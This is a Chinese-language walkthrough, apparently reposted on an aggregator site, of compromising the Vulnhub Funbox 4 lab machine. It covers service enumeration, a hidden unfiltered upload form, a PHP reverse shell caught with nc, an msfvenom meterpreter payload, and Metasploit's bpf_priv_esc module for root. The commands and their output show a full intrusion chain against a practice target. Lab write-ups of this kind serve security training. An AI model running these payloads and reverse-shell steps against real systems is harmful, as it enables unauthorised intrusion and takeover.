Vulnhub之Funbox 4靶机详细测试过程(提权成功)

这篇具有很好参考价值的文章主要介绍了Vulnhub之Funbox 4靶机详细测试过程(提权成功)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Funbox 4

靶机信息

名称:Funbox: CTF

URL:

https://www.vulnhub.com/entry/funbox-ctf,546/

识别靶机IP地址

将靶机导入 VirtualBox。配置其网卡为主机模式配置。启动 Kali Linux 和靶机。

内置 netdiscovery工具 可以将靶机的 IP 地址识别为 192.168.56.150。

(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                              

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                                           
 192.168.56.100  08:00:27:4e:f4:34      1      60  PCS Systemtechnik GmbH                                                                                   
 192.168.56.150  08:00:27:4e:a2:f4      1      60  PCS Systemtechnik GmbH           

NMAP 扫描

利用NMAP工具进行全端口扫描:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.150 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-06 02:45 EDT
Nmap scan report for bogon (192.168.56.150)
Host is up (0.00024s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f6:b3:8f:f1:e3:b7:6c:18:ee:31:22:d3:d4:c9:5f:e6 (RSA)
|   256 45:c2:16:fc:3e:a9:fc:32:fc:36:fb:d7:ce:4f:2b:fe (ECDSA)
|_  256 4f:f8:46:72:22:9f:d3:10:51:9c:49:e0:76:5f:25:33 (ED25519)
80/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open  pop3    Dovecot pop3d
|_pop3-capabilities: PIPELINING AUTH-RESP-CODE UIDL TOP SASL CAPA RESP-CODES
143/tcp open  imap    Dovecot imapd
|_imap-capabilities: have SASL-IR capabilities LOGIN-REFERRALS IDLE ENABLE post-login OK LITERAL+ Pre-login listed ID more LOGINDISABLEDA0001 IMAP4rev1
MAC Address: 08:00:27:4E:A2:F4 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.70 seconds

NMAP扫描结果表明目标主机有4个开放端口:

22(ssh),80(http),110(pop3),143(imap)

获得Shell

└─$ nikto -h http://192.168.56.150
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.150
+ Target Hostname:    192.168.56.150
+ Target Port:        80
+ Start Time:         2023-05-06 02:46:11 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2c39, size: 5ae05b2177aa4, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2023-05-06 02:47:07 (GMT-4) (56 seconds)
---------------------------------------------------------------------------

其实作者给出了一个提示,即本靶机nikto时区分大小写。虽然/robots.txt文件不存在,看可测试大写字母的ROBOTS.TXT是否存在。

──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ curl http://192.168.56.150/ROBOTS.TXT    
Disallow: upload/


Disallow: igmseklhgmrjmtherij2145236
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ curl http://192.168.56.150/igmseklhgmrjmtherij2145236/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /igmseklhgmrjmtherij2145236/
on this server.<br />
</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.56.150 Port 80</address>
</body></html>

但是访问 igmseklhgmrjmtherij2145236 返回 forbidden的信息,因此可能该目录下存在子目录或者文件,继续用gobuster工具扫描.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ gobuster dir -u http://192.168.56.150/igmseklhgmrjmtherij2145236/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.bak,.js,.txt,.sh
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.150/igmseklhgmrjmtherij2145236/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,html,bak,js,txt,sh
[+] Timeout:                 10s
===============================================================
2023/05/06 03:04:36 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 321]
/.php                 (Status: 403) [Size: 320]
/upload.html          (Status: 200) [Size: 297]
/upload               (Status: 301) [Size: 344] [--> http://192.168.56.150/igmseklhgmrjmtherij2145236/upload/]
/upload.php           (Status: 200) [Size: 319]
Progress: 11663 / 1543927 (0.76%)^C
[!] Keyboard interrupt detected, terminating.

上述目录下发现了/upload子目录以及upload.php 文件,后者允许我们上传文件,而且没有任何过滤机制,因此接下来就是上次shell.php文件,但是该文件放在什么位置呢,注意到有/upload子目录,可能在该子目录下,经访问验证了这一点:

http://192.168.56.150/igmseklhgmrjmtherij2145236/upload/shell.php

在Kali Linux上成功得到了目标主机反弹回来的shell.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.150] 48272
Linux funbox4 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 09:08:17 up 26 min,  0 users,  load average: 1.13, 1.81, 2.70
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@funbox4:/$ cd /home
cd /home
www-data@funbox4:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x  4 root   root   4.0K Aug 29  2020 .
drwxr-xr-x 23 root   root   4.0K May  6 09:07 ..
drwx------  4 anna   anna   4.0K Aug 30  2020 anna
drwxr-xr-x  4 thomas thomas 4.0K Aug 30  2020 thomas
www-data@funbox4:/home$ cd anna
cd anna
bash: cd: anna: Permission denied
www-data@funbox4:/home$ cd thomas
cd thomas
www-data@funbox4:/home/thomas$ ls -alh
ls -alh
total 3.0M
drwxr-xr-x 4 thomas thomas 4.0K Aug 30  2020 .
drwxr-xr-x 4 root   root   4.0K Aug 29  2020 ..
-rw------- 1 thomas thomas   46 Aug 30  2020 .bash_history
-rw-r--r-- 1 thomas thomas  220 Aug 29  2020 .bash_logout
-rw-r--r-- 1 thomas thomas 3.7K Aug 29  2020 .bashrc
drwx------ 2 thomas thomas 4.0K Aug 29  2020 .cache
-rw-r--r-- 1 thomas thomas  675 Aug 29  2020 .profile
drwx------ 2 thomas thomas 4.0K Aug 30  2020 .ssh
-rw-r--r-- 1 thomas thomas  195 Aug 29  2020 .todo
-rw------- 1 thomas thomas 1.3K Aug 30  2020 .viminfo
-rw-rw-r-- 1 thomas thomas  217 Aug 30  2020 .wget-hsts
-rwx------ 1 thomas thomas 3.0M Aug 22  2019 pspy64

Privilege Escalation

www-data@funbox4:/$ cat hint.txt
cat hint.txt
The OS beard ist whiter and longer as Gandalfs one !
Perhaps, its possible to get root from here. 
I doesnt look forward to see this in the writeups/walktroughs, 
but this is murpys law !

Now, rockyou.txt isnt your friend. Its a little sed harder :-)

If you need more brainfuck: Take this:
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>++++++++++++++.>++++.---.<<++.>>+++++++++.---------.+++++++++++++++++++.----.<<.>>------------.+.+++++.++++++.<<.>>-----------.++++++++++.<<.>>-------.+++.------------.--.+++++++++++++++++++.---------------.-.<<.>>+++++.+++++.<<++++++++++++++++++++++++++.

Bit more ?
Tm8gaGludHMgaGVyZSAhCg==

Not enough ?
KNSWC4TDNAQGM33SEB2G6ZDPOMXA====
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>++++++++++++++.>++++.---.<<++.>>+++++++++.---------.+++++++++++++++++++.----.<<.>>------------.+.+++++.++++++.<<.>>-----------.++++++++++.<<.>>-------.+++.------------.--.+++++++++++++++++++.---------------.-.<<.>>+++++.+++++.<<++++++++++++++++++++++++++.

利用下面的网站解码上述信息(brainfuck):

https://www.splitbrain.org/services/ook

解码得到

The next hint is located in:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ echo 'Tm8gaGludHMgaGVyZSAhCg==' | base64 -d
No hints here !
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ echo 'KNSWC4TDNAQGM33SEB2G6ZDPOMXA====' | base32 -d
Search for todos.    

但是其实这些虽然成功解码,没什么价值,是作者故意留的一些陷阱。下一步将已经得到的shell升级到meterpreter,不过本靶机特殊的是,靶机上没有wget, curl等工具,可以用upload.php页面来上传文件:

─(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ msfvenom -p  linux/x86/meterpreter/reverse_tcp  LHOST=192.168.56.230 LPORT=6666 -f elf -o escalate.elf

将escalate.elf载荷上传到目标主机/tmp目录下,并修改权限 .

www-data@funbox4:/var/www/html/igmseklhgmrjmtherij2145236$ cd upload
cd upload
www-data@funbox4:/var/www/html/igmseklhgmrjmtherij2145236/upload$ ls -alh
ls -alh
total 20K
drwxrwxrwx 2 root     root     4.0K May  6 09:25 .
drwxr-xr-x 3 root     root     4.0K Aug 29  2020 ..
-rw-r--r-- 1 www-data www-data  207 May  6 09:25 escalate.elf
-rw-r--r-- 1 www-data www-data 5.4K May  6 09:07 shell.php
www-data@funbox4:/var/www/html/igmseklhgmrjmtherij2145236/upload$ mv escalate.elf /tmp
<tml/igmseklhgmrjmtherij2145236/upload$ mv escalate.elf /tmp                 
www-data@funbox4:/var/www/html/igmseklhgmrjmtherij2145236/upload$ cd /tmp
cd /tmp
www-data@funbox4:/tmp$ chmod +x escalate.elf
chmod +x escalate.elf
www-data@funbox4:/tmp$ 

同时在Kali Linux启动handler, 等待目标主机的连接。

msf6 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set LhOST 192.168.56.230
LhOST => 192.168.56.230
msf6 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.56.230:6666 

在目标主机shell中执行载荷,然后利用suggester模块定位合适的提权模块文章来源地址https://www.toymoban.com/news/detail-435062.html

msf6 exploit(multi/handler) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester

msf6 exploit(multi/handler) > use  post/multi/recon/local_exploit_suggester 
msf6 post(multi/recon/local_exploit_suggester) > show options 

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.56.150 - Collecting local exploits for x86/linux...
[*] 192.168.56.150 - 167 exploit checks are being tried...
[+] 192.168.56.150 - exploit/linux/local/bpf_priv_esc: The target appears to be vulnerable.
[+] 192.168.56.150 - exploit/linux/local/bpf_sign_extension_priv_esc: The target appears to be vulnerable.
[+] 192.168.56.150 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 192.168.56.150 - exploit/linux/local/glibc_realpath_priv_esc: The target appears to be vulnerable.
[+] 192.168.56.150 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 192.168.56.150 - exploit/linux/local/su_login: The target appears to be vulnerable.
[*] Running check method for exploit 48 / 48
[*] 192.168.56.150 - Valid modules for session 1:
============================

 #   Name                                                               Potentially Vulnerable?  Check Result
 -   ----                                                               -----------------------  ------------
 1   exploit/linux/local/bpf_priv_esc                                   Yes                      The target appears to be vulnerable.
 2   exploit/linux/local/bpf_sign_extension_priv_esc                    Yes                      The target appears to be vulnerable.
 3   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                Yes                      The target is vulnerable.
 4   exploit/linux/local/glibc_realpath_priv_esc                        Yes                      The target appears to be vulnerable.
 5   exploit/linux/local/pkexec                                         Yes                      The service is running, but could not be validated.
 6   exploit/linux/local/su_login                                       Yes                      The target appears to be vulnerable.
msf6 post(multi/recon/local_exploit_suggester) >  use exploit/linux/local/bpf_priv_esc
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/bpf_priv_esc) > show options 

Module options (exploit/linux/local/bpf_priv_esc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   COMPILE  Auto             yes       Compile on target (Accepted: Auto, True, False)
   MAXWAIT  120              yes       Max time to wait for decrementation in seconds
   SESSION                   yes       The session to run this module on


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux x64


msf6 exploit(linux/local/bpf_priv_esc) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(linux/local/bpf_priv_esc) > set LPORT 8888
LPORT => 8888
msf6 exploit(linux/local/bpf_priv_esc) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/bpf_priv_esc) > run

[*] Started reverse TCP handler on 192.168.56.230:8888 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[-] libfuse-dev is not installed.  Compiling will fail.
[*] Writing '/tmp/hello' (9576 bytes) ...
[*] Writing '/tmp/doubleput' (13920 bytes) ...
[*] Writing '/tmp/suidhelper' (25792 bytes) ...
[*] Writing '/tmp/.dSu6XHZTXdNaEU' (282 bytes) ...
[*] Launching exploit. This may take up to 120 seconds.
[!] This module adds a job to /etc/crontab which requires manual removal!
[+] Success! set-uid root /tmp/suidhelper
[*] Sending stage (3020772 bytes) to 192.168.56.150
[+] Deleted /tmp/hello
[+] Deleted /tmp/doubleput
[+] Deleted /tmp/.dSu6XHZTXdNaEU
[*] Meterpreter session 2 opened (192.168.56.230:8888 -> 192.168.56.150:53458) at 2023-05-06 03:36:04 -0400

meterpreter > shell
Process 10780 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
cd /root
ls -alh
total 36K
drwx------  3 root root 4.0K Aug 30  2020 .
drwxr-xr-x 23 root root 4.0K May  6 09:07 ..
-rw-------  1 root root 1.9K Aug 30  2020 .bash_history
-rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
drwx------  2 root root 4.0K Aug 30  2020 .cache
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root 6.4K Aug 30  2020 .viminfo
-rw-r--r--  1 root root  430 Aug 29  2020 flag.txt
cat flag.txt
(  _`\              ( )                       (  _`\(_   _)(  _`\ 
| (_(_)_   _   ___  | |_      _          _    | ( (_) | |  | (_(_)
|  _) ( ) ( )/' _ `\| '_`\  /'_`\ (`\/')(_)   | |  _  | |  |  _)  
| |   | (_) || ( ) || |_) )( (_) ) >  <  _    | (_( ) | |  | |    
(_)   `\___/'(_) (_)(_,__/'`\___/'(_/\_)(_)   (____/' (_)  (_)    

Well done ! Made with ❤ by @0815R2d2 ! I look forward to see this screenshot on twitter ;-)

到了这里,关于Vulnhub之Funbox 4靶机详细测试过程(提权成功)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Vulnhub之Hacksudo Search靶机详细测试过程(不同提权方法)

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.162 NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http) nikto发现目录/account/,该目录下虽然有众多文件,但是访问这些文件,返回均为空。 nikto另外发现了/.env, 该文件包含了数据库连接用户名和密码,但是该

    2023年04月25日
    浏览(39)
  • Vulnhub之Cengbox 2靶机详细测试过程(利用不同的方法提权)

    域名:ceng-company.vm 可能的用户名: kevin, aaron 其他:kevin可能密码比较弱 但是访问域名ceng-company.vm,返回页面内容没有发生变化 目录扫描没有啥收获,是否存在子域名? 发现admin子域名返回状态码为403 将该子域名加入到/etc/hosts文件: 访问admin.ceng-company.vm返回“Forbidden\\\",是

    2024年02月10日
    浏览(30)
  • Vulnhub之Ino靶机详细测试过程(采用完全不同方法获得Shell以及本地提权)

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.253 NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http) 访问80端口,从返回的页面看CMS为Lot Reservation Management System 但目前不知道版本,先看一下有无其他目录可利用。 会被自动重定向到/lot目录。 用Gobuster工具无

    2023年04月16日
    浏览(43)
  • Vulnhub之Decoy靶机-详细提权过程补充

    在拿到用户296640a3b825115a47b68fc44501c828的密码server后,为了方便观察现象,同时开启两个shell,并且需要指定-t \\\"bash --noprofile\\\"以逃避受限shell,登录成功后,要修改PATH环境变量,使其包含正常的环境变量: 在日志文件中看到有关chkrootkit的日志信息,chkrootkit是检查系统是否存在后门的

    2024年02月06日
    浏览(31)
  • Vulnhub之Gigroot靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.103 NMAP扫描结果表明目标主机有3个开放端口:22(ssh)、80(http)、11211(?) 将wp.gitroot.vuln加入/etc/hosts文件中: 此时访问url,从返回页面可知目标为Wordpress站点: 因为我们已知目标运行wordpress站点,因此从gobuster和nikto工具运

    2024年02月01日
    浏览(36)
  • Vulnhub之GreenOptics靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 NMAP扫描结果表明目标主机有5个开放端口:21(ftp)、22(ssh)、53(dns)、80(http)、10000(http) 说明需要添加主机记录到/etc/hosts文件: 再次访问: 返回页面为用户登录界面,10000端口的信息收集暂时告一段落。 nikto没有得到

    2024年02月01日
    浏览(39)
  • Vulnhub之Healthcare靶机详细测试过程

    作者: jason huawen 名称: 地址: 利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 NMAP扫描结果表明目标主机有2个开放端口:21(ftp)、80(http) FTP不允许匿名访问 FTP服务为ProFTPD,可能存在mod_copy漏洞 robots.txt存在/admin/条目,但是访问该目录,却返回页面不存在的错误

    2023年04月22日
    浏览(52)
  • Vulnhub之Inclusiveness靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.111 NMAP扫描结果表明目标主机有3个开放端口:21(ftp)、22(ssh)、80(http) 对FTP服务的信息收集结果如下: 目标主机允许匿名访问 匿名用户允许上传文件 匿名用户无法变换目录 FTP服务版本没有漏洞可利用 接下来做一下目

    2023年04月19日
    浏览(39)
  • Vulnhub之Maskcrafter靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 john没有破解出credit.zip密码,而且作者有提示,不需要使用破解方法。 目标主机没有NFS共享目录。 Kali Linux访问80端口,为用户登录界面,用admin\\\' or 1=1 -- 即可轻松绕过。 登录成功后,在页面源代码中有注释: 访问

    2023年04月10日
    浏览(29)
  • Vulnhub之HF 2019靶机详细测试过程

    作者:jason huawen 名称:Hacker Fest: 2019 地址: 将虚拟机镜像导入到VirtualBox中,并设置网络模式为host-only,然后启动Kali Linux以及目标主机(虚拟机): 利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 从NMAP扫描结果表明目标主机有4个开放端口:21(ftp)、22(ssh)、8

    2023年04月22日
    浏览(41)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包